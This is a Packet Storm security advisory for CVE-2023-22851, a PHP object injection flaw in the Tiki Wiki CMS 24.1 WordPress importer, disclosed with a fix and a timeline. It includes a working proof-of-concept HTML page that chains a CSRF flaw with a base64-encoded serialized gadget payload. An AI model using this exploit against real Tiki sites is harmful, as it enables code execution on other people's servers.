Tiki Wiki CMS Groupware 24.1 tikiimporter_blog_wordpress.php PHP Object Injection ≈ Packet Storm

Home^[1] Files^[2] News^[3] &[SERVICES_TAB] Contact^[4] Add New^[5]

Change Mirror^[13] Download^[14]

        ----------------------------------------------------------------------------------------------------
Tiki Wiki CMS Groupware <= 24.1 (tikiimporter_blog_wordpress.php) PHP 
Object Injection Vulnerability
----------------------------------------------------------------------------------------------------
[-] Software Link:
https://tiki.org
[-] Affected Versions:
Version 24.1 and prior versions.
[-] Vulnerability Description:
The vulnerability is located in the 
/lib/importer/tikiimporter_blog_wordpress.php script. Specifically, when 
importing data from WordPress sites through the Tiki Importer, user 
input passed through the uploaded XML file is being used in a call to 
the unserialize() PHP function. This can be exploited by malicious users 
to inject arbitrary PHP objects into the application scope, allowing 
them to perform a variety of attacks, such as executing arbitrary PHP 
code. Successful exploitation of this vulnerability requires an admin 
account (specifically, the ‘tiki_p_admin_importer’ permission). However, 
due to the CSRF vulnerability described in KIS-2023-01, this 
vulnerability might also be exploited by tricking a victim user into 
opening a web page like the following:
<html>
<form action="http://localhost/tiki/tiki-importer.php" method="POST" 
enctype="multipart/form-data">
<input type="hidden" name="importerClassName" 
value="TikiImporter_Blog_Wordpress" />
<input type="hidden" name="importAttachments" value="on" />
<input type="file" name="importFile" id="fileinput"/>
</form>
<script>
const xmlContent = 
atob("PD94bWwgdmVyc2lvbj0iMS4wIiA/Pgo8cnNzIHZlcnNpb249IjIuMCIgeG1sbnM6d3A9Imh0dHA6Ly93b3JkcHJlc3Mub3JnL2V4cG9ydC8xLjIvIj4KIDxjaGFubmVsPgogIDxpdGVtPgogICA8d3A6cG9zdF90eXBlPmF0dGFjaG1lbnQ8L3dwOnBvc3RfdHlwZT4KICAgPHdwOnBvc3RtZXRhPgogICAgPHdwOm1ldGFfa2V5Pl93cF9hdHRhY2htZW50X21ldGFkYXRhPC93cDptZXRhX2tleT4KICAgIDx3cDptZXRhX3ZhbHVlPjwhW0NEQVRBW086MjU6IlNlYXJjaF9FbGFzdGljX0Nvbm5lY3Rpb24iOjE6e1M6MzE6IlwwMFNlYXJjaF9FbGFzdGljX0Nvbm5lY3Rpb25cMDBidWxrIjtPOjI4OiJTZWFyY2hfRWxhc3RpY19CdWxrT3BlcmF0aW9uIjozOntTOjM1OiJcMDBTZWFyY2hfRWxhc3RpY19CdWxrT3BlcmF0aW9uXDAwY291bnQiO2k6MTtTOjM4OiJcMDBTZWFyY2hfRWxhc3RpY19CdWxrT3BlcmF0aW9uXDAwY2FsbGJhY2siO1M6MTQ6ImNhbGxfdXNlcl9mdW5jIjtTOjM2OiJcMDBTZWFyY2hfRWxhc3RpY19CdWxrT3BlcmF0aW9uXDAwYnVmZmVyIjthOjI6e2k6MDtPOjIyOiJUcmFja2VyX0ZpZWxkX0NvbXB1dGVkIjozOntTOjMyOiJcMDBUcmFja2VyX0ZpZWxkX0Fic3RyYWN0XDAwaXRlbURhdGEiO2E6MTp7Uzo2OiJpdGVtSWQiO2k6MTt9UzozMToiXDAwVHJhY2tlcl9GaWVsZF9BYnN0cmFjdFwwMG9wdGlvbnMiO086MTU6IlRyYWNrZXJfT3B0aW9ucyI6MTp7UzoyMToiXDAwVHJhY2tlcl9PcHRpb25zXDAw
ZGF0YSI7YToxOntTOjc6ImZvcm11bGEiO1M6MTQ6Im51bGw7cGhwaW5mbygpIjt9fVM6NDE6IlwwMFRyYWNrZXJfRmllbGRfQWJzdHJhY3RcMDB0cmFja2VyRGVmaW5pdGlvbiI7TzoxODoiVHJhY2tlcl9EZWZpbml0aW9uIjowOnt9fWk6MTtTOjEyOiJnZXRGaWVsZERhdGEiO319fV1dPjwvd3A6bWV0YV92YWx1ZT4KICAgPC93cDpwb3N0bWV0YT4KICA8L2l0ZW0+CiA8L2NoYW5uZWw+CjwvcnNzPg==");
const fileInput = document.getElementById("fileinput");
const dataTransfer = new DataTransfer();
const file = new File([xmlContent], "test.xml", {type: "text/xml"});
dataTransfer.items.add(file);
fileInput.files = dataTransfer.files;
document.forms[0].submit();
</script>
</html>
[-] Solution:
Upgrade to version 24.2 or later.
[-] Disclosure Timeline:
[07/03/2022] - Vendor notified
[23/08/2022] - Version 24.1 released
[09/01/2023] - Public disclosure
[-] CVE Reference:
The Common Vulnerabilities and Exposures project (cve.mitre.org)
has assigned the name CVE-2023-22851 to this vulnerability.
[-] Credits:
Vulnerability discovered by Egidio Romano.
[-] Original Advisory:
http://karmainsecurity.com/KIS-2023-04

• Follow us on Twitter^[17]
• Subscribe to an RSS Feed^[18]

File Tags

• ActiveX^[19] (932)
• Advisory^[20] (79,818)
• Arbitrary^[21] (15,721)
• BBS^[22] (2,859)
• Bypass^[23] (1,625)
• CGI^[24] (1,018)
• Code Execution^[25] (6,949)
• Conference^[26] (674)
• Cracker^[27] (840)
• CSRF^[28] (3,291)
• DoS^[29] (22,628)
• Encryption^[30] (2,353)
• Exploit^[31] (50,416)
• File Inclusion^[32] (4,166)
• File Upload^[33] (946)
• Firewall^[34] (821)
• Info Disclosure^[35] (2,664)
• Intrusion Detection^[36] (868)
• Java^[37] (2,903)
• JavaScript^[38] (823)
• Kernel^[39] (6,307)
• Local^[40] (14,210)
• Magazine^[41] (586)
• Overflow^[42] (12,432)
• Perl^[43] (1,418)
• PHP^[44] (5,097)
• Proof of Concept^[45] (2,293)
• Protocol^[46] (3,438)
• Python^[47] (1,468)
• Remote^[48] (30,080)
• Root^[49] (3,506)
• Rootkit^[50] (501)
• Ruby^[51] (595)
• Scanner^[52] (1,633)
• Security Tool^[53] (7,792)
• Shell^[54] (3,108)
• Shellcode^[55] (1,206)
• Sniffer^[56] (887)
• Spoof^[57] (2,172)
• SQL Injection^[58] (16,115)
• TCP^[59] (2,382)
• Trojan^[60] (686)
• UDP^[61] (878)
• Virus^[62] (662)
• Vulnerability^[63] (31,169)
• Web^[64] (9,378)
• Whitepaper^[65] (3,732)
• x86^[66] (946)
• XSS^[67] (17,500)
• Other^[68]

File Archives

• January 2023^[69]
• December 2022^[70]
• November 2022^[71]
• October 2022^[72]
• September 2022^[73]
• August 2022^[74]
• July 2022^[75]
• June 2022^[76]
• May 2022^[77]
• April 2022^[78]
• March 2022^[79]
• February 2022^[80]
• Older^[81]

Systems

• AIX^[82] (426)
• Apple^[83] (1,935)
• BSD^[84] (370)
• CentOS^[85] (55)
• Cisco^[86] (1,917)
• Debian^[87] (6,644)
• Fedora^[88] (1,690)
• FreeBSD^[89] (1,242)
• Gentoo^[90] (4,279)
• HPUX^[91] (878)
• iOS^[92] (333)
• iPhone^[93] (108)
• IRIX^[94] (220)
• Juniper^[95] (67)
• Linux^[96] (44,375)
• Mac OS X^[97] (684)
• Mandriva^[98] (3,105)
• NetBSD^[99] (255)
• OpenBSD^[100] (479)
• RedHat^[101] (12,485)
• Slackware^[102] (941)
• Solaris^[103] (1,607)
• SUSE^[104] (1,444)
• Ubuntu^[105] (8,220)
• UNIX^[106] (9,173)
• UnixWare^[107] (185)
• Windows^[108] (6,511)
• Other^[109]

© 2022 Packet Storm. All rights reserved.